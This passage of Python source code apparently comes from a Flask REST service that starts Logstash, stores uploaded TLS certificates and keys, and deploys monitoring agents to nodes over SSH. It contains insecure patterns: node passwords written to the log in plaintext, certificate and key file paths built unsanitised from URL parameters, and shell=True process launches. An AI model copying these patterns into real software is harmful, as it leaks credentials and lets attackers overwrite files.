datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot start LS Core'})
response.status_code = 500
return response
lsPID = check_proc(lsPIDFileLoc)
if not lsPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for ls core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read lscore pid file'})
response.status_code = 500
return response
qSCore.LSCorePID = lsPID
qSCore.LSCoreStatus = 'Running'
response = jsonify({'Status': 'LS Core Started', 'PID': lsPID, 'Storm': stormStatus, 'YarnHistory': yarnStatus})
response.status_code = 201
app.logger.info("[%s] : [INFO] LS Core started with PID %s, Storm %s and YanrHistory %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), lsPID, stormStatus, yarnStatus)
return response
@dmon.route('/v1/overlord/core/ls/<hostFQDN>/status')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class LSCoreControllerStatus(Resource):
def get(self, hostFQDN):
qLSCoreStatus = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qLSCoreStatus is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
pid = qLSCoreStatus.LSCorePID
if not checkPID(pid):
if pid != 0:
qLSCoreStatus.LSCoreStatus = 'Stopped'
else:
qLSCoreStatus.LSCoreStatus = 'unknown'
response = jsonify({'Status': qLSCoreStatus.LSCoreStatus,
'PID': qLSCoreStatus.LSCorePID})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/ls/<hostFQDN>/start')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class LSCoreControllerStart(Resource):
def post(self, hostFQDN):
lsfCore = os.path.join(cfgDir, 'logstash.conf')
lsLogfile = os.path.join(logDir, 'logstash.log')
qLSCoreStart = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qLSCoreStart is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
if checkPID(qLSCoreStart.LSCorePID) is True:
proc = psutil.Process(qLSCoreStart.LSCorePID)
if proc.status() == psutil.STATUS_ZOMBIE:
# print >> sys.stderr, 'Process ' + str(qLSCoreStart.LSCorePID) + ' is zombie!'
app.logger.warning('[%s] : [WARN] Process %s is a zombie!',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qLSCoreStart.LSCorePID))
else:
response = jsonify({'Status': 'LS already Running',
'PID': qLSCoreStart.LSCorePID})
response.status_code = 200
return response
lsPid = 0
try:
lsPid = subprocess.Popen('/opt/logstash/bin/logstash agent -f ' + lsfCore + ' -l ' + lsLogfile + ' -w 4',
shell=True).pid
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start ls core instance with %s and %s!',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot start LS Core service'})
response.status_code = 500
return response
# print >> sys.stderr, 'Error while starting logstash'
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
qLSCoreStart.LSCorePID = lsPid
qLSCoreStart.LSCoreStatus = 'Running'
# LS core pid location
pidLSLoc = os.path.join(pidDir, 'logstash.pid')
try:
lsPIDFile = open(pidLSLoc, 'w+')
lsPIDFile.write(str(lsPid))
lsPIDFile.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
return response
response = jsonify({'Status': 'Logstash Core PID ' + str(lsPid)})
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/ls/<hostFQDN>/stop')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class LSCoreControllerStop(Resource):
def post(self, hostFQDN):
qLSCoreStop = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qLSCoreStop is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
if checkPID(qLSCoreStop.LSCorePID) is True:
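# Kill the whole Logstash process tree: child processes first, then the parent PID recorded in the DB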
parent = psutil.Process(qLSCoreStop.LSCorePID)
for c in parent.children(recursive=True):
c.kill()
parent.kill()
os.kill(qLSCoreStop.LSCorePID, signal.SIGKILL)
qLSCoreStop.LSCoreStatus = 'Stopped'
response = jsonify({'Status': 'Stopped',
'Message': 'Stopped LS instance at ' + str(qLSCoreStop.LSCorePID)})
response.status_code = 200
return response
else:
qLSCoreStop.LSCoreStatus = 'unknown'
response = jsonify({'Status': 'No LS Instance Found',
'Message': 'No LS instance with PID ' + str(qLSCoreStop.LSCorePID)})
response.status_code = 404
return response
@dmon.route('/v1/overlord/core/ls/credentials')
class LSCredControl(Resource):
def get(self):
credList = []
credAll = db.session.query(dbSCore.hostFQDN, dbSCore.hostIP, dbSCore.sslCert, dbSCore.sslKey).all()
if credAll is None:
response = jsonify({'Status': 'No credentials set!'})
response.status_code = 404
return response
for nl in credAll:
credDict = {}
# print >> sys.stderr, nl[0]
app.logger.info('[%s] : [INFO] Credentials host %s!',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nl[0])
credDict['LS Host'] = nl[0]
credDict['Certificate'] = nl[2]
credDict['Key'] = nl[3]
credList.append(credDict)
response = jsonify({'Credentials': credList})
response.status_code = 200
return response
# def post(self):
# qLSCore = dbSCore.query.first()
# if qLSCore is None:
# response = jsonify({'Status':'No LS Core set!'})
# response.status_code = 404
# return response
# templateLoader = jinja2.FileSystemLoader( searchpath="/" )
# templateEnv = jinja2.Environment( loader=templateLoader )
# oSSLTemp= os.path.join(tmpDir,'openssl.tmp')
# oSSLLoc = os.path.join(cfgDir,'openssl.cnf')
# template = templateEnv.get_template( oSSLTemp )
# osslPop = {"LSHostIP":qLSCore.hostIP}
# oSSLConf = template.render(osslPop)
# osslFile = open(lsfCore,"wb")
# osslFile.write(oSSLLoc)
# osslFile.close()
@dmon.route('/v1/overlord/core/ls/cert/<certName>')
@api.doc(params={'certName': 'Name of the certificate'})
class LSCertQuery(Resource):
def get(self, certName):
qSCoreCert = dbSCore.query.filter_by(sslCert=certName).all()
certList = []
for i in qSCoreCert:
certList.append(i.hostFQDN)
if not certList:
response = jsonify({'Status': certName + ' not found!'})
response.status_code = 404
return response
else:
response = jsonify({'Hosts': certList})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/ls/cert/<certName>/<hostFQDN>')
@api.doc(params={'certName': 'Name of the certificate',
'hostFQDN': 'Host FQDN'})
class LSCertControl(Resource):
@api.expect(certModel) # TODO FIX THIS
def put(self, certName, hostFQDN):
if request.headers['Content-Type'] == 'application/x-pem-file':
pemData = request.data
else:
abort(400)
qSCoreCert = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qSCoreCert is None:
response = jsonify({'Status': 'unknown host'})
response.status_code = 404
return response
else:
if certName == 'default':
crtFile = os.path.join(credDir, 'logstash-forwarder.crt')
else:
crtFile = os.path.join(credDir, certName + '.crt')
try:
cert = open(crtFile, 'w+')
cert.write(pemData)
cert.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
return response
qSCoreCert.sslCert = certName
response = jsonify({'Status': 'updated certificate!'})
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/ls/key/<keyName>')
@api.doc(params={'keyName': 'Name of the private key.'})
class LSKeyQuery(Resource):
def get(self, keyName):
if keyName == 'default':
response = jsonify({'Key': 'default'})
response.status_code = 200
return response
qSCoreKey = dbSCore.query.filter_by(sslKey=keyName).first()
if qSCoreKey is None:
response = jsonify({'Status': keyName + ' not found!'})
response.status_code = 404
return response
response = jsonify({'Host': qSCoreKey.hostFQDN, 'Key': qSCoreKey.sslKey})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/ls/key/<keyName>/<hostFQDN>')
@api.doc(params={'keyName': 'Name of the private key.', 'hostFQDN': 'Host FQDN'})
class LSKeyControl(Resource):
def put(self, keyName, hostFQDN):
if request.headers['Content-Type'] == 'application/x-pem-file':
pemData = request.data
else:
abort(400)
qSCoreKey = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qSCoreKey is None:
response = jsonify({'Status': 'unknown host'})
response.status_code = 404
return response
else:
if keyName == 'default':
keyFile = os.path.join(credDir, 'logstash-forwarder.key')
else:
keyFile = os.path.join(credDir, keyName + '.key')
try:
key = open(keyFile, 'w+')
key.write(pemData)
key.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
return response
qSCoreKey.sslKey = keyName
response = jsonify({'Status': 'updated key!'})
response.status_code = 201
return response
@dmon.route('/v1/overlord/aux')
class AuxInfo(Resource):
def get(self):
response = jsonify({'AuxComponents': ['collectd', 'logstash-forwarder', 'jmx']})
response.status_code = 200
return response
@dmon.route('/v1/overlord/aux/deploy')
class AuxDeploy(Resource):
def get(self):
qNodes = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP, dbNodes.nMonitored,
dbNodes.nCollectdState, dbNodes.nLogstashForwState, dbNodes.nLogstashInstance).all()
mnList = []
for nm in qNodes:
mNode = {}
mNode['NodeFQDN'] = nm[0]
mNode['NodeIP'] = nm[1]
mNode['Monitored'] = nm[2]
mNode['Collectd'] = nm[3]
mNode['LSF'] = nm[4]
mNode['LSInstance'] = nm[5]
mnList.append(mNode)
# print >> sys.stderr, nm
response = jsonify({'Aux Status': mnList})
response.status_code = 200
return response
@api.doc(parser=dmonAuxAll) # TODO Status handling (Running, Stopped, None )Needs Checking
def post(self): # TODO currently works only if the same username and password is used for all Nodes
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
lsfTemp = os.path.join(tmpDir, 'logstash-forwarder.tmp') # tmpDir+"/collectd.tmp"
collectdTemp = os.path.join(tmpDir, 'collectd.tmp')
collectdConfLoc = os.path.join(cfgDir, 'collectd.conf')
lsfConfLoc = os.path.join(cfgDir, 'logstash-forwarder.conf')
qNodes = db.session.query(dbNodes.nodeFQDN, dbNodes.nMonitored,
dbNodes.nCollectdState, dbNodes.nLogstashForwState, dbNodes.nUser, dbNodes.nPass,
dbNodes.nodeIP, dbNodes.nLogstashInstance).all()
result = []
credentials = {}
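# Collect every node that is not yet monitored; the credentials of the last node seen are reused for all of them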
for n in qNodes:
credentials['User'] = n[4] # TODO need a more elegant solution, currently it is rewritten every iteration
credentials['Pass'] = n[5]
# print >> sys.stderr, credentials
app.logger.info('[%s] : [INFO] Credentials used %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), credentials)
rp = {}
if n[1] == False: # check if node is monitored
rp['Node'] = n[0]
rp['Collectd'] = n[2]
rp['LSF'] = n[3]
rp['IP'] = n[6]
rp['LSInstance'] = n[7]
# rp['User']=n[4]
# rp['Pass']=n[5]
result.append(rp)
collectdList = []
LSFList = []
allNodes = []
for res in result:
if res['Collectd'] == 'None':
# print >> sys.stderr, 'No collectd!'
app.logger.info('[%s] : [INFO] No collectd',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
collectdList.append(res['IP'])
if res['LSF'] == 'None':
LSFList.append(res['IP'])
app.logger.info('[%s] : [INFO] No LSF',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
# print >> sys.stderr, 'No LSF!'
allNodes.append(res['IP'])
args = dmonAuxAll.parse_args()
if args == 'redeploy-all': # TODO check if conf files exist if not catch error
uploadFile(allNodes, credentials['User'], credentials['Pass'], collectdConfLoc, 'collectd.conf',
'/etc/collectd/collectd.conf')
uploadFile(allNodes, credentials['User'], credentials['Pass'], lsfConfLoc, 'logstash-forwarder.conf',
'/etc/logstash-forwarder.conf')
serviceCtrl(allNodes, credentials['User'], credentials['Pass'], 'collectd', 'restart')
serviceCtrl(allNodes, credentials['User'], credentials['Pass'], 'logstash-forwarder', 'restart')
response = jsonify({'Status': 'All aux components reloaded!'})
response.status_code = 200
return response
if not collectdList and not LSFList:
response = jsonify({'Status': 'All registered nodes are already monitored!'})
response.status_code = 200
return response
app.logger.info('[%s] : [INFO] Collectd list -> %s, LSFList -> %s, credentials -> %s, Conf dir -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), collectdList, LSFList, credentials['User'], confDir)
# print >> sys.stderr, collectdList
# print >> sys.stderr, LSFList
# print >> sys.stderr, credentials['User']
# print >> sys.stderr, confDir
qSCore = dbSCore.query.first() # TODO Change for distributed deployment
if qSCore is None:
response = jsonify({'Status': 'DB empty',
'Message': 'There is no logstash instance registered!'})
response.status_code = 400
return response
try:
lsfTemplate = templateEnv.get_template(lsfTemp)
# print >>sys.stderr, template
except:
app.logger.error('[%s] : [ERROR] Template file unavailable',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Template file unavailable'})
response.status_code = 500
return response
# {{ESCoreIP}}:{{LSLumberPort}}
infolsfAux = {"ESCoreIP": qSCore.hostIP, "LSLumberPort": qSCore.inLumberPort}
lsfConf = lsfTemplate.render(infolsfAux)
lsfConfFile = open(lsfConfLoc, "wb") # TODO trycatch
lsfConfFile.write(lsfConf)
lsfConfFile.close()
# {{logstash_server_ip}}" "{{logstash_server_port}}
try:
collectdTemplate = templateEnv.get_template(collectdTemp)
except:
app.logger.error('[%s] : [ERROR] Template file unavailable',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Template file unavailable'})
response.status_code = 500
return response
# return "Template file unavailable!"
infocollectdAux = {"logstash_server_ip": qSCore.hostIP, "logstash_server_port": qSCore.udpPort}
collectdConf = collectdTemplate.render(infocollectdAux)
collectdConfFile = open(collectdConfLoc, "wb")
collectdConfFile.write(collectdConf)
collectdConfFile.close()
try:
installCollectd(collectdList, credentials['User'], credentials['Pass'], confDir=cfgDir)
except Exception as inst: # TODO if exceptions is detected check to see if collectd started if not return fail if yes return warning
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
app.logger.error('[%s] : [ERROR] Cannot install collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error Installing collectd!'})
response.status_code = 500
return response
# TODO Assign logstash server instance to each node
try:
installLogstashForwarder(LSFList, userName=credentials['User'], uPassword=credentials['Pass'],
confDir=cfgDir)
except Exception as inst:
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
app.logger.error('[%s] : [ERROR] Cannot install lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error Installing LSF!'})
response.status_code = 500
return response
for c in collectdList:
updateNodesCollectd = dbNodes.query.filter_by(nodeIP=c).first()
if updateNodesCollectd is None:
response = jsonify({'Error': 'DB error, IP ' + c + ' not found!'})
response.status_code = 500
return response
updateNodesCollectd.nCollectdState = 'Running'
for l in LSFList:
updateNodesLSF = dbNodes.query.filter_by(nodeIP=l).first()
if updateNodesLSF is None:
response = jsonify({'Error': 'DB error, IP ' + l + ' not found!'})
response.status_code = 500
return response
updateNodesLSF.nLogstashForwState = 'Running'
updateAll = dbNodes.query.filter_by(nMonitored=0).all()
for ua in updateAll:
ua.nMonitored = 1
response = jsonify({'Status': 'Aux Components deployed!'})
response.status_code = 201
return response
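# /v2/overlord/aux/agent: GET lists per-node agent deployment status (nStatus); POST copies the
# dmon-agent to every node that does not have one yet, using one set of credentials for all nodes.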
@dmon.route('/v2/overlord/aux/agent') # TODO: create better variant
class AuxAgentDeploy(Resource):
def get(self):
qNodes = db.session.query(dbNodes.nodeFQDN, dbNodes.nStatus).all()
an = []
for n in qNodes:
nAgent = {}
nAgent['NodeFQDN'] = n[0]
nAgent['Agent'] = n[1]
an.append(nAgent)
response = jsonify({'Agents': an})
response.status_code = 200
app.logger.info('[%s] : [INFO] Agents status: %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(an))
return response
def post(self): # todo verify
qN = db.session.query(dbNodes.nodeIP, dbNodes.nStatus, dbNodes.nUser, dbNodes.nPass).all()
if not qN:
response = jsonify({'Status': 'No nodes registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
noAgent = []
user = ' '
password = ' '
for n in qN:
if not n[1]:
noAgent.append(n[0])
user = n[2]
password = n[3]
if not noAgent:
response = jsonify({'Status': 'All nodes have unpacked agents'})
response.status_code = 200
app.logger.info('[%s] : [INFO] All nodes have unpacked agents',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
try:
deployAgent(noAgent, user, password)
except Exception as inst:
response = jsonify({'Status': 'Agent Error',
'Message': 'Error while deploying agent!'})
app.logger.error('[%s] : [ERROR] Failed to deploy agent %s with %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response.status_code = 500
return response
for a in noAgent:
updateAll = dbNodes.query.filter_by(nodeIP=a).first()
updateAll.nStatus = 1
response = jsonify({'Status': 'Done', 'Message': 'Agents Installed!'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Agents installed',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
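# /v2/overlord/agent/start: starts the dmon-agent on nodes that have an agent deployed but are not
# yet monitored, and marks the successful ones as monitored.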
@dmon.route('/v2/overlord/agent/start')
class AuxAgentStart(Resource):
def post(self):
qNodeStatus = dbNodes.query.filter_by(nStatus=1).all()
app.logger.info('[%s] : [INFO] Node Status %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(qNodeStatus))
if not qNodeStatus:
response = jsonify({'Status': 'Agent Exception',
'Message': 'No agents are registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No agents registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
dnode = []
nnodes = []
for ns in qNodeStatus:
node = []
if ns.nMonitored:
continue
else:
node.append(ns.nodeIP)
app.logger.info('[%s] : [INFO] Unmonitored nodes %s', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(node))
AgentNodes = {}
try:
startAgent(node, ns.nUser, ns.nPass)
ns.nMonitored = 1
app.logger.info('[%s] : [INFO] Started agent at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(node))
AgentNodes['Node'] = ns.nodeFQDN
AgentNodes['IP'] = ns.nodeIP
dnode.append(AgentNodes)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Error starting agent on %s with exception %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(ns.nodeFQDN), type(inst), inst.args)
AgentNodes['Node'] = ns.nodeFQDN
AgentNodes['IP'] = ns.nodeIP
nnodes.append(AgentNodes)
break
response = jsonify({'Status': 'Agents Started',
'Successful': dnode,
'Failed': nnodes})
response.status_code = 200
app.logger.info('[%s] : [INFO] Agents started on nodes %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(dnode))
return response
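# /v2/overlord/agent/stop: stops the dmon-agent on all monitored nodes and clears their nMonitored flag.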
@dmon.route('/v2/overlord/agent/stop') #todo verify
class AuxAgentStop(Resource):
def post(self):
qNodeStatus = dbNodes.query.filter_by(nMonitored=1).all()
if not qNodeStatus:
response = jsonify({'Status': 'Agent Exception',
'Message': 'No agents are registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No agents registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
dnode = []
for ns in qNodeStatus:
node = []
node.append(ns.nodeIP)
app.logger.info('[%s] : [INFO] Monitored nodes %s', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(node))
try:
stopAgent(node, ns.nUser, ns.nPass)
except Exception as inst:
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error Stopping agent on ' + ns.nodeFQDN + '!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] Error stopping agent on %s with exception %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(ns.nodeFQDN), type(inst), inst.args)
return response
app.logger.info('[%s] : [INFO] Stopped agent at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(node))
AgentNodes = {}
AgentNodes['Node'] = ns.nodeFQDN
AgentNodes['IP'] = ns.nodeIP
dnode.append(AgentNodes)
ns.nMonitored = 0
response = jsonify({'Status': 'Agents Stopped',
'Nodes': dnode})
response.status_code = 200
app.logger.info('[%s] : [INFO] Agents stopped on nodes %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(dnode))
return response
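# /v2/overlord/aux/status: read-only report of the monitored/agent state and the collectd/LSF state
# for every registered node.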
@dmon.route('/v2/overlord/aux/status')
class AuxDeployStatus(Resource):
def get(self):
qNodes = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP, dbNodes.nMonitored, dbNodes.nStatus,
dbNodes.nCollectdState, dbNodes.nLogstashForwState).all()
mnList = []
for nm in qNodes:
mNode = {}
mNode['NodeFQDN'] = nm[0]
mNode['NodeIP'] = nm[1]
mNode['Monitored'] = nm[2]
mNode['Status'] = nm[3]
mNode['Collectd'] = nm[4]
mNode['LSF'] = nm[5]
mnList.append(mNode)
# print >> sys.stderr, nm
app.logger.info('[%s] : [INFO] Nodes -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(mnList))
response = jsonify({'Aux Status': mnList})
response.status_code = 200
return response
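# /v2/overlord/aux/deploy: builds one dmon-agent deploy resource per node (agent port 5222) from the
# node roles and issues the POST requests in parallel through GreenletRequests.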
@dmon.route('/v2/overlord/aux/deploy') # TODO: gets current status of aux components and deploy them based on roles
class AuxDeployThread(Resource):
# def put(self): # TODO: used to enact new configurations
# return "Reload new Configuration"
def post(self):
qNodes = db.session.query(dbNodes.nodeIP, dbNodes.nRoles).all()
if not qNodes:
response = jsonify({'Status': 'No nodes registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nrList = []
for nr in qNodes:
nrNode = {}
nrNode[nr[0]] = nr[1].split(',')
nrList.append(nrNode)
app.logger.info('[%s] : [INFO] Node list -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nrList))
resFin = {}
for e in nrList:
for k, v in e.iteritems():
nodeList = []
nodeList.append(k)
agentr = AgentResourceConstructor(nodeList, '5222')
resourceList = agentr.deploy()
r = {'roles': v}
resFin[resourceList[-1]] = r
app.logger.info('[%s] : [INFO] Resource List %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), resFin)
dmon = GreenletRequests(resFin)
nodeRes = dmon.parallelPost(None)
app.logger.info('[%s] : [INFO] Node resources %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeRes))
# print >> sys.stderr, str(nodeRes)
failedNodes = []
NodeDict = {}
for n in nodeRes:
nodeIP = urlparse(n['Node'])
qNode = dbNodes.query.filter_by(nodeIP=nodeIP.hostname).first()
qNode.nMonitored = 1 # TODO: Recheck nStatus and nMonitored roles when are they true and when are they false
if n['StatusCode'] != 201:
failedNodes.append({'NodeIP': str(nodeIP.hostname),
'Code': n['StatusCode']})
# print >> sys.stderr, str(n['Data']['Components'])
# print >> sys.stderr, str(n)
app.logger.debug('[%s] : [DEBUG] Node response -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(n))
try:
NodeDict[nodeIP.hostname] = n['Data']['Components']
except Exception as inst:
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
app.logger.error('[%s] : [ERROR] Keys missing, exception %s with %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
NodeDict[nodeIP.hostname] = "Failed"
response = jsonify({'Status': 'Installed Aux ',
'Message': NodeDict,
'Failed': failedNodes})
response.status_code = 200
dmon.reset()
return response
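# /v2/overlord/aux/deploy/check: polls the dmon-agent check resource on every node and updates the
# stored collectd/LSF state accordingly.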
@dmon.route('/v2/overlord/aux/deploy/check')
class AuxDeployCheckThread(Resource):
def get(self):
agentPort = '5222'
nodesAll = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP).all()
if not nodesAll:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
return response
nodeList = []
for n in nodesAll:
nodeList.append(n[1])
agentr = AgentResourceConstructor(nodeList, agentPort)
resourceList = agentr.check()
dmon = GreenletRequests(resourceList)
nodeRes = dmon.parallelGet()
failedNodes = []
for i in nodeRes:
nodeIP = urlparse(i['Node'])
qNode = dbNodes.query.filter_by(nodeIP=nodeIP.hostname).first()
if i['Data'] != 'n/a':
qNode.nMonitored = 1
qNode.nStatus = 1
if i['Data']['LSF'] == 1:
qNode.nLogstashForwState = "Running"
elif i['Data']['LSF'] == 0:
qNode.nLogstashForwState = "Stopped"
else:
qNode.nLogstashForwState = "None"
if i['Data']['Collectd'] == 1:
qNode.nCollectdState = "Running"
elif i['Data']['Collectd'] == 0:
qNode.nCollectdState = "Stopped"
else:
qNode.nCollectdState = "None"
else:
qNode.nLogstashForwState = "None"
qNode.nCollectdState = "None"
if i['StatusCode'] != 200:
failedNodes.append({'NodeIP': str(nodeIP.hostname),
'Code': i['StatusCode']})
qNode.nMonitored = 0
response = jsonify({'Status': 'Update',
'Message': 'Nodes updated!',
'Failed': failedNodes})
response.status_code = 200
dmon.reset()
return response
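# /v1/overlord/aux/deploy/<auxComp>/<nodeFQDN>: per-node deployment over SSH; installs collectd or
# logstash-forwarder on a single node, or restarts it when the 'redeploy' argument is given.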
@dmon.route('/v1/overlord/aux/deploy/<auxComp>/<nodeFQDN>') # TODO check parameter redeploy functionality
@api.doc(params={'auxComp': 'Aux Component',
'nodeFQDN': 'Node FQDN'}) # TODO document nMonitored set to true when first started monitoring
class AuxDeploySelective(Resource):
@api.doc(parser=dmonAux)
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf']
# status = {}
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component ' + auxComp})
response.status_code = 400
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Unknown node ' + nodeFQDN})
response.status_code = 404
return response
args = dmonAux.parse_args()
node = []
node.append(qAux.nodeIP)
if auxComp == 'collectd':
if args == 'redeploy':
if qAux.nCollectdState != 'Running':
response = jsonify({'Status': 'No collectd instance to restart!'})
response.status_code = 404
return response
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'collectd', 'restart')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error restarting Collectd on ' + nodeFQDN + '!'})
response.status_code = 500
return response
response = jsonify({'Status': 'Collectd restarted on ' + nodeFQDN})
response.status_code = 200
return response
if qAux.nCollectdState == 'None':
try:
installCollectd(node, qAux.nUser, qAux.nPass, confDir=cfgDir)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot install collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error Installing Collectd on ' + qAux.nodeFQDN + '!'})
response.status_code = 500
return response
# status[auxComp] = 'Running'
qAux.nCollectdState = 'Running'
response = jsonify({'Status': 'Collectd started on ' + nodeFQDN + '.'})
response.status_code = 201
return response
else:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' collectd already started!'})
response.status_code = 200
return response
elif auxComp == 'lsf':
if args == 'redeploy':
if qAux.nLogstashForwState != 'Running':
response = jsonify({'Status': 'No LSF instance to restart!'})
response.status_code = 404
return response
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'logstash-forwarder', 'restart')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error restarting LSF on ' + nodeFQDN + '!'})
response.status_code = 500
return response
response = jsonify({'Status': 'LSF restarted on ' + nodeFQDN})
response.status_code = 200
return response
if qAux.nLogstashForwState == 'None':
try:
installLogstashForwarder(node, qAux.nUser, qAux.nPass, confDir=cfgDir)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot install lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error Installing LSF on ' + qAux.nodeFQDN + '!'})
response.status_code = 500
return response
# status[auxComp] = 'Running'
qAux.nLogstashForwState = 'Running'
response = jsonify({'Status': 'LSF started on ' + nodeFQDN + '.'})
response.status_code = 201
return response
else:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' LSF already started!'})
response.status_code = 200
return response
